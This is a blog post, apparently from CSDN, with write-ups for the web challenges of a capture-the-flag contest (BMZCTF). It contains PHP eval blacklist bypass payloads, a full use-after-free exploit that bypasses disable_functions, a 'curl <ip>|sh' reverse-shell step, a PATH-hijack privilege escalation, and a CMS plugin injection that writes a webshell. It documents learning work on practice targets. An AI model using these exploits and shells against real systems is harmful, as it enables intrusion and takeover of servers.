第一届BMZCTF公开赛-WEB-Writeup

最新推荐文章于 2023-01-04 10:19:51 发布
于 2020-12-30 01:47:18 发布 3463 收藏 17
分类专栏: CTF_WEB_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/111916620
版权

文章目录

前言

首先恭喜白帽子社区团队成功举办第一届BMZCTF公开赛,我是本次比赛MISC赛题Snake、Tiga的出题人末初
以下是我对于的这次BMZCTF公开赛的WEB赛题的一些Writeup,如果有什么写的不对的还请师傅们留言斧正

ezeval

 <?php
highlight_file(__FILE__);
$cmd=$_POST['cmd'];
$cmd=htmlspecialchars($cmd);
$black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','include','var','print','scan','decode','system','func','ini_','passthru','pcntl','open','link','log','current','local','source','require','contents');
$cmd = str_ireplace($black_list,"BMZCTF",$cmd);
eval($cmd);
?>

这里代码执行绕过方法很多

字符串拼接绕过

cmd=(s.y.s.t.e.m)('cat /flag');

在这里插入图片描述

进制编码绕过

cmd=hex2bin('73797374656d')('cat /flag');

在这里插入图片描述

异或绕过

import string

char = string.printable
cmd = 'system'
tmp1,tmp2 = '',''
for res in cmd:
    for i in char:
        for j in char:
            if(ord(i)^ord(j) == ord(res)):
                tmp1 += i
                tmp2 += j
                break
        else:
            continue
        break
print(tmp1,tmp2)

cmd=('0000000'^'CICDU]')('cat /flag');

在这里插入图片描述
还有很多别的方法可以绕过,就不一一赘述了

ezphp

 <?php 
highlight_file(__FILE__);
$cmd=$_POST['a'];
if(strlen($cmd) > 25){
    die();
}else{
    eval($cmd);
}

phpinfo()查看下
在这里插入图片描述
disable_functions发现大量禁用函数
在这里插入图片描述

pcntl_alarm
pcntl_fork
pcntl_waitpid
pcntl_wait
pcntl_wifexited
pcntl_wifstopped
pcntl_wifsignaled
pcntl_wifcontinued
pcntl_wexitstatus
pcntl_wtermsig
pcntl_wstopsig
pcntl_signal
pcntl_signal_get_handler
pcntl_signal_dispatch
pcntl_get_last_error
pcntl_strerror
pcntl_sigprocmask
pcntl_sigwaitinfo
pcntl_sigtimedwait
pcntl_exec
pcntl_getpriority
pcntl_setpriority
pcntl_async_signals
system
exec
shell_exec
popen
proc_open
passthru
symlink
link
syslog
imap_open
ld
dl
mail
gc_collect_cycles
getenv
unserialize
putenv
serialize
Imagick��

putenv被过滤了,那LD_PRELOAD & putenv()bypass disable function的方法肯定不行了

先绕过strlen()限制,上线蚁剑

a=eval($_POST[mochu7]);&mochu7=phpinfo();

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
蚁剑的Bypass disable function插件无法支持利用
在这里插入图片描述
然后在先知找到一篇UAF bypass PHP disabled functions的文章的exp可以利用

原文地址:https://xz.aliyun.com/t/8355#toc-3
exp.php

<?php
error_reporting(0);
$a = str_repeat("T", 120 * 1024 * 1024);
function i2s(&$a, $p, $i, $x = 8) {
    for($j = 0;$j < $x;$j++) {
        $a[$p + $j] = chr($i & 0xff);
        $i >>= 8;
    }
}

function s2i($s) {
    $result = 0;
    for ($x = 0;$x < strlen($s);$x++) {
        $result <<= 8;
        $result |= ord($s[$x]);
    }
    return $result;
}

function leak(&$a, $address) {
    global $s;
    i2s($a, 0x00, $address - 0x10);
    return strlen($s -> current());
}

function getPHPChunk($maps) {
    $pattern = '/([0-9a-f]+\-[0-9a-f]+) rw\-p 00000000 00:00 0 /';
    preg_match_all($pattern, $maps, $match);
    foreach ($match[1] as $value) {
        list($start, $end) = explode("-", $value);
        if (($length = s2i(hex2bin($end)) - s2i(hex2bin($start))) >= 0x200000 && $length <= 0x300000) {
            $address = array(s2i(hex2bin($start)), s2i(hex2bin($end)), $length);
            echo "[+]PHP Chunk: " . $start . " - " . $end . ", length: 0x" . dechex($length) . "\n";
            return $address;
        }
    }
}

function bomb1(&$a) {
    if (leak($a, s2i($_GET["test1"])) === 0x5454545454545454) {
        return (s2i($_GET["test1"]) & 0x7ffff0000000);
    }else {
        die("[!]Where is here");
    }
}

function bomb2(&$a) {
    $start = s2i($_GET["test2"]);
    return getElement($a, array($start, $start + 0x200000, 0x200000));
    die("[!]Not Found");
}

function getElement(&$a, $address) {
    for ($x = 0;$x < ($address[2] / 0x1000 - 2);$x++) {
        $addr = 0x108 + $address[0] + 0x1000 * $x + 0x1000;
        for ($y = 0;$y < 5;$y++) {
            if (leak($a, $addr + $y * 0x08) === 0x1234567812345678 && ((leak($a, $addr + $y * 0x08 - 0x08) & 0xffffffff) === 0x01)){
                echo "[+]SplDoublyLinkedList Element: " . dechex($addr + $y * 0x08 - 0x18) . "\n";
                return $addr + $y * 0x08 - 0x18;
            }
        }
    }
}

function getClosureChunk(&$a, $address) {
    do {
        $address = leak($a, $address);
    }while(leak($a, $address) !== 0x00);
    echo "[+]Closure Chunk: " . dechex($address) . "\n";
    return $address;
}

function getSystem(&$a, $address) {
    $start = $address & 0xffffffffffff0000;
    $lowestAddr = ($address & 0x0000fffffff00000) - 0x0000000001000000;
    for($i = 0; $i < 0x1000 * 0x80; $i++) {
        $addr = $start - $i * 0x20;
        if ($addr < $lowestAddr) {
            break;
        }
        $nameAddr = leak($a, $addr);
        if ($nameAddr > $address || $nameAddr < $lowestAddr) {
            continue;
        }
        $name = dechex(leak($a, $nameAddr));
        $name = str_pad($name, 16, "0", STR_PAD_LEFT);
        $name = strrev(hex2bin($name));
        $name = explode("\x00", $name)[0];
        if($name === "system") {
            return leak($a, $addr + 0x08);
        }
    }
}

class Trigger {
    function __destruct() {
        global $s;
        unset($s[0]);
        $a = str_shuffle(str_repeat("T", 0xf));
        i2s($a, 0x00, 0x1234567812345678);
        i2s($a, 0x08, 0x04, 7);
        $s -> current();
        $s -> next();
        if ($s -> current() !== 0x1234567812345678) {
             die("[!]UAF Failed");
        }
        $maps = file_get_contents("/proc/self/maps");
        if (!$maps) {
            cantRead($a);
        }else {
            canRead($maps, $a);
        }
        echo "[+]Done";
    }
}

function bypass($elementAddress, &$a) {
    global $s;
    if (!$closureChunkAddress = getClosureChunk($a, $elementAddress)) {
        die("[!]Get Closure Chunk Address Failed");
    }
    $closure_object = leak($a, $closureChunkAddress + 0x18);
    echo "[+]Closure Object: " . dechex($closure_object) . "\n";
    $closure_handlers = leak($a, $closure_object + 0x18);
    echo "[+]Closure Handler: " . dechex($closure_handlers) . "\n";
    if(!($system_address = getSystem($a, $closure_handlers))) {
        die("[!]Couldn't determine system address");
    }
    echo "[+]Find system's handler: " . dechex($system_address) . "\n";
    i2s($a, 0x08, 0x506, 7);
    for ($i = 0;$i < (0x130 / 0x08);$i++) {
        $data = leak($a, $closure_object + 0x08 * $i);
        i2s($a, 0x00, $closure_object + 0x30);
        i2s($s -> current(), 0x08 * $i + 0x100, $data);
    }
    i2s($a, 0x00, $closure_object + 0x30);
    i2s($s -> current(), 0x20, $system_address);
    i2s($a, 0x00, $closure_object);
    i2s($a, 0x08, 0x108, 7);
    echo "[+]Executing command: \n";
    ($s -> current())("php -v");
}

function canRead($maps, &$a) {
    global $s;
    if (!$chunkAddress = getPHPChunk($maps)) {
        die("[!]Get PHP Chunk Address Failed");
    }
    i2s($a, 0x08, 0x06, 7);
    if (!$elementAddress = getElement($a, $chunkAddress)) {
        die("[!]Get SplDoublyLinkedList Element Address Failed");
    }
    bypass($elementAddress, $a);
}

function cantRead(&$a) {
    global $s;
    i2s($a, 0x08, 0x06, 7);
    if (!isset($_GET["test1"]) && !isset($_GET["test2"])) {
        die("[!]Please try to get address of PHP Chunk");
    }
    if (isset($_GET["test1"])) {
        die(dechex(bomb1($a)));
    }
    if (isset($_GET["test2"])) {
        $elementAddress = bomb2($a);
    }
    if (!$elementAddress) {
        die("[!]Get SplDoublyLinkedList Element Address Failed");
    }
    bypass($elementAddress, $a);
}

$s = new SplDoublyLinkedList();
$s -> push(new Trigger());
$s -> push("Twings");
$s -> push(function($x){});
for ($x = 0;$x < 0x100;$x++) {
    $s -> push(0x1234567812345678);
}
$s -> rewind();
unset($s[0]);

/tmp目录有写入权限,可以上传文件
在这里插入图片描述
exp.php上传到/tmp然后include('/tmp/exp.php')即可执行命令

可以看到已经执行了php -v
在这里插入图片描述
执行/readflag
在这里插入图片描述

penetration

 <?php
highlight_file(__FILE__);
if(isset($_GET['ip'])){
    $ip = $_GET['ip'];
    $_=array('b','d','e','-','q','f','g','i','p','j','+','k','m','n','\<','\>','o','w','x','\~','\:','\^','\@','\&','\'','\%','\"','\*','\(','\)','\!','\=','\.','\[','\]','\}','\{','\_');
    $blacklist = array_merge($_);
    foreach ($blacklist as $blacklisted) {
        if (strlen($ip) <= 18){
            if (preg_match ('/' . $blacklisted . '/im', $ip)) {
                die('nonono');
            }else{
            exec($ip);
            }
            
        }
        else{
        die("long");
        }
    }
    
}
?>

过滤了一些字符,exec无回显,考虑反弹shell
限制了长度,所以直接输入反弹shell的payload行不通
可以将反弹shell的payload写在云服务器上,然后通过curl ip|sh来反弹
这里ip过滤了点,可以转换为十进制来弹
在这里插入图片描述
传入?ip=curl ip的十进制|sh 自己的服务器监听7777端口即可得到shell

在这里插入图片描述
得到shell后发现根目录下没有flag,猜测在root目录下,需要进行提权

使用suid进行提权
查看具有suid的命令

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
发现一个奇怪的命令,执行一下

在这里插入图片描述
发现该命令使用了ps命令,并且未使用绝对路径,所以可以尝试更改$PATH来执行该文件
环境变量提权

cd /tmp

echo "/bin/bash" > ps

chmod 777 ps

echo $PATH 

export PATH=/tmp:$PATH #将/tmp添加到环境变量中

love

在这里插入图片描述

BMZ_Market

在这里插入图片描述
查看源代码
在这里插入图片描述
尝试伪协议读取源码

/?lang=php://filter/read=convert.base64-encode/resource=index

在这里插入图片描述

<?php
$password ="Nevergiveup135." ;//I have to remember it

if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}

?>



<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="BMZ Market">
    <meta name="author" content="bmz">

    <title>BMZ Market</title>


    <link href="bootstrap.css" rel="stylesheet">

    
    <link href="covers.css" rel="stylesheet">
  </head>

  <body class="text-center">

    <div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
      <header class="masthead mb-auto">
        <div class="inner">
          <h3 class="masthead-brand">BMZ Market</h3>
          <nav class="nav nav-masthead justify-content-center">
            <a class="nav-link active" href="#">Home</a>
            <!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
          </nav>
        </div>
      </header>

      <main role="main" class="inner cover">
        <h1 class="cover-heading">Coming soon</h1>
        <p class="lead">
          <?php
            if (isset($_GET['lang']))
          {
          echo $message;
          }
          else
          {
            ?>

            Believe in yourself, you can find the flag
            <?php
          }
?>
        </p>
        <p class="lead">
          <a href="#" class="btn btn-lg btn-secondary">more</a>
        </p>
      </main>

      <footer class="mastfoot mt-auto">
        <div class="inner">
          <p>Power by<a href="#">@kuaile</a></p>
        </div>
      </footer>
    </div>

</body></html>

得到一个密码:Nevergiveup135.
可能是后台账号密码

接着信息收集发现robots.txt

在这里插入图片描述
base64解码得到AAencode编码

aaencode解码:http://www.atoolbox.net/Tool.php?Id=703

在这里插入图片描述

alert("Challenger, the background of the website is -.../--/--../.-/-../--/../-.");

摩斯解码:http://www.zhongguosou.com/zonghe/moErSiCodeConverter.aspx

BMZADMIN

尝试访问bmzadmin.php
在这里插入图片描述
用户名填网站首页的:kuaile
密码填源码中发现的:Nevergiveup135.

登入后台
在这里插入图片描述

查看源码,在title中发现网站版本在这里插入图片描述
不是什么最新的版本,直接搜索引擎找相关漏洞
在这里插入图片描述
直接参考:https://www.cnblogs.com/jinqi520/p/11274699.html

利用Weapp.php文件中的create()方法接收了请求中的参数,过滤后直接存入php配置文件中,但是由于过滤不严,导致可以直接写入代码进去并执行。

首先点击功能开关然后点击开启插件应用
在这里插入图片描述
然后点击插件应用,点击插件开发者

在这里插入图片描述
创建插件,填写相关数据,抓包
在这里插入图片描述
控制scene参数写入shell

&scene=bbb\',${eval($_POST[mochu7])},//

在这里插入图片描述
bmzadmin.php成功写入shell
在这里插入图片描述
上蚁剑,sudo -l发现当前用户可以root身份执行所有操作
在这里插入图片描述
在这里插入图片描述

末初mochu7
关注
  • 13
    点赞
  • 17
    收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
BMZCTF-WEB_ezeval
CHAWUCIREN1的博客
04-28 123
BMZCTF-WEB_ezeval 又是PHP代码审计的东西。 <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','asser
UNCTF2022-公开赛|MISC(上)
zerorzeror的博客
11-20 166
UNCTF2022-公开赛|MISC(上)
BMZCTF:内存取证三项(数字取证)
zip471642048的博客
04-22 603
文章目录内存取证查看imageinfo查看所有活动进程查看下cmd.exe的使用情况发现个压缩包,文件扫描出文件在内存的位置dump出文件在当前目录修改为zip后缀寻找压缩包密码猜测压缩包密码得到flag 内存取证 内存取证三项.txt 一天下午小白出去吃饭,临走之前还不忘锁了电脑,这时同寝室的小黑想搞点事情,懂点黑客和社工知识的小黑经过多次尝试获得了密码成功进入电脑,于是便悄悄在电脑上动起手脚了,便在桌面上写着什么,想给小白一个惊喜,同时还传送着小白的机密文件,正巧这时小白刚好回来,两人都吓了一跳,小黑
CTF中的PHP特性函数(下)
最新发布
小王的储物间
01-04 320
本文到这就结束了,这篇文章讲了几个比较有趣而且有一些难度的特性知识,不知道大家吸收的咋样了,当然PHP特性远没有这么少,有兴趣的小伙伴可以自行去了解一下。喜欢本文的朋友希望可以一键三连支持一下。
BMZCTF SSRFME 详解
u013797594的博客
07-04 436
BMZCTF ssrfme详解 题目: 打开题目直接是PHP代码,阅读代码:首先要求传入get参数file和path,file会直接赋值给$url,path会拼接upload,如果$path里面有…那么就会终止执行。$url如果以http://127.0.0.1/开头,则通过file_get_contents($url)读取内容,然后通过file_put_contents()写入到$path中,并且通过echo输出"console.log($path update successed!)" ,$path
BMZCTF 山东省大学生网络技术大赛-baby
qq_26243045的博客
12-03 472
下载附件,是一个脚本文件: ``` # -*- coding: utf-8 -*- from Crypto.PublicKey import RSA import libnum import uuid flag = "flag{***************}" rsa = RSA.generate(4096,e=3) p = rsa.p d = rsa.d e = rsa.e N = rsa.n m = libnum.s2n(flag) c = pow(m, e, N..
CTFshow——web入门——php特性(上篇)
h_adam的博客
11-16 3091
web入门——php特性web89web90web91web92 web89 题目 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $fl
第一届BMZCTF公开赛-MISC-Writeup
末初 · mochu7
12-28 5635
文章目录Tiga Tiga vim查看tiga.txt发现存在零宽度字符 零宽度字符隐写在线站:https://yuanfux.github.io/zero-width-web/ 得到misc.zip密码:GiveTiGaGuang! 迪迦.jpg文件尾附加了youcanalso.zip的密码信息 file.zip的密码很明显需要通过爆破这些密码片段文件的CRC得到内容 爆破脚本如下: import binascii import string def crack_crc(): print
二、BMZCTF-[easy_php]-[本地复现]-[简单的代码审计]
qwsn
01-01 687
1.addslashes($string):对字符串参数中的预定义字符进行转义,并返回转义后的字符串 2.__DIR__:取出当前脚本执行的物理路径 3.PD9waHAKJExBTkdbJ21lbWJlcl9tYW5hZ2UnXSA9ICdhZG1pbic7Cj8+Cg== <?php $LANG['member_manage'] = 'admin'; ?> 4.file_get_contents — 将整个文件读入一个字符串 5.file_put_contents — 将一个字符串写入
BMZCTF 真正的CTFer
m0_63253040的博客
03-10 230
下载CTFer.zip,里面还有个压缩包 压缩包里面只有一张图片 没有看见flag,我一般习惯先找属性,但是没有,再看010,也没看见特殊点,最后放到kali里的时候打开图片发现有crc错误,一般碰到这个是要改宽高,但是我还是用binwalk扫了下,发现没有什么 所以返回010去改,但是我发现只要一改宽,图片直接被损坏无法看,那就只改高把,最后是改到5000,16进制转换就是1388 这里因为我眼睛不好,真的真的看不见flag就在图片上 下次还是要仔细看图片 fl
ctf刷题小结
quan9i的博客
05-15 1012
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
BMZCTF (持续更新)
zip471642048的博客
04-24 289
文章目录真正的CTFer 真正的CTFer 调整高度可以得到完整的图像大小
关于BMZCTF中 shell_exec的解法详解
永远是少年
01-15 706
BMZCTF中,有一道题是shell_exec,在尝试做了该题后,又翻看了现有的write-up,发现现有的write-up语焉不详,对于不原理和微操讲解不细,因此写了这篇文章,主要是在前人的基础上对此题进行进一步描述,主要针对刚接触此领域的小白用户,希望能够对他们理解这道题提供帮助。 首先,打开本题,可以看到如下界面: 进行测试,发现输入一个IP地址或者域名后,可以PING测试对应的IP,然后把结果反馈到界面上来。 之后,查看页面源代码(不要问我为什么要查看页面源代码,做CTF题查看页面源代码应该是本
BMZCTF 网鼎杯 2018 minified
qq_26243045的博客
01-06 169
下载附件,为一个压缩包,打开后是一张图片。 用010editor打开,没有什么发现。 用Stegsolve打开,分离出alpha的0通道、red的0通道、green的0通道和blue的0通道。两两相互异或,最后发现alpha的0通道与green的0通道异或,就能看到flag: flag{7bb6db9f-d2eb-4e69-8dee-0002ce1e07f9} ...
BMZCTF(泰湖杯-MISC)
qq_46540840的博客
01-29 598
BMZCTF(泰湖杯-MISC)用到的方法1.zip伪加密2.docx文档文字的隐藏3.希尔密码加密4.Rabbit加密5.音频分析 用到的方法 1.zip伪加密 首先一个是加密的压缩包 一个是还处在带解密的doc文档。那么一种假设的线索就有了从doc文档中提取密码,来解压缩包。另一种假设是从压缩包解开来作为提取doc文档的密码.不过一般都是前者居多。 先从最外层开始最简单的就是zip的伪加密了 用 ZipCenOp.jar 一试便知 用法 java -jar ZipCenOp.jar r +需要解密的压缩
使用无参数函数进行命令执行
kali_Ma的博客
01-17 1766
前言 在这里总结一下无参数命令执行。 环境准备 测试代码 <?php highlight_file(__FILE__); if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } ?> 关键代码 preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']) 这里使用pregreplace替换匹配到的字符为空,\
BMZCTF misc1
qq_61768489的博客
04-02 1624
真正的CTFer 010修改图片高度,steg查看更清晰 解不开的秘密 word加密 文件给了16密文 ,转ASCII后继续转base64, 得到数据 [HKEY_CURRENT_USER\Software\RealVNC\VNCViewer4\MRU] "00"="127.0.0.1" "Order"=hex:00,01 "01"="127.0.0.1:5900" [HKEY_CURRENT_USER\Software\RealVNC\WinVNC4] "Password"=hex:
ctfshow 新手杯 web
shinygod的博客
10-09 369
基础练习
ctfshow单身杯部分wp
m0_62422842的博客
07-09 709
php伪协议,sed命令和awk命令的用法与应用。SSTI的绕过
BUU Dest0g3 520迎新赛 WEB writeup
weixin_43610673的博客
05-29 1465
WEB phpdest <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once($_GET['file']); } require_once 绕过不能重复包含文件的限制 /?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/r
CTF中PHP相关题目考点总结(二)
HBohan的博客
02-16 2190
介绍 本篇文章主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点,这样的话比较容易理解。 PHP特性相关考点 一、 考点:php正则表达式的匹配模式差异。 例题: show_source(__FILE__); include('flag.php'); $a=$_GET['cmd']; if(preg_match('/^php$/im', $a)){ #/i表示不区分大小写,/m表示多行匹配 i.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末初mochu7

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值